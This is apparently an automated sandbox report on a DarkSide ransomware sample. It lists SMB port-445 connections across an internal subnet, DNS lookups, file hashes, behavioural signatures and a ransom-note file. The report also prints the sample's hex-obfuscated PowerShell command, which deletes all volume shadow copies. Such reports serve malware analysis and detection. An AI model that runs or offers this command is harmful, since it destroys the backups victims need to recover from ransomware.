| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.43:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.192:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.252:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.248:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.251:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.240:445 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\ProgramData\R3ADM3.txt
| MD5 | e6f001fc98cb51a0429ca5dc95f6a950 |
| SHA1 | 16a73b95d0b5408fa95c97bc9f314f1eff4902b4 |
| SHA256 | acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b |
| SHA512 | 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c |
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1699s
Max time network
1164s
Command Line
Signatures
DarkSide
Renames multiple (164) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4052 wrote to memory of 3124 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4052 wrote to memory of 3124 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
memory/4052-0-0x0000000000910000-0x0000000000920000-memory.dmp
memory/3124-1-0x00007FFB937C3000-0x00007FFB937C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmzo3zz.2x1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3124-8-0x000002BEB2E10000-0x000002BEB2E32000-memory.dmp
memory/3124-12-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp
memory/3124-15-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp
C:\Users\README.6f83c4b2.TXT
| MD5 | 25d0b19a0ec34a39dfa3e177866f01a3 |
| SHA1 | a3704d1f6499738ccd694bdd6008a850c6b2e453 |
| SHA256 | f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8 |
| SHA512 | ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
memory/4052-26-0x0000000000910000-0x0000000000920000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7bd0d74ff0bb98e8751cae71652ed62e |
| SHA1 | caff8e2a964e2900fbe38a3f243499c126b3d4e4 |
| SHA256 | 64c6fad7f8c73c79d9c041118f7fef91738366bc17ff7f8cee2876dacbc25113 |
| SHA512 | df72f1960f1fddf04497e38afee3a40ab8ed7f9fd9d701b83ef2e1cbd63530447f596297acbc215abef7ae08cdd381dc6dcf1e1f5ffdbfa25d82ab357bf68892 |
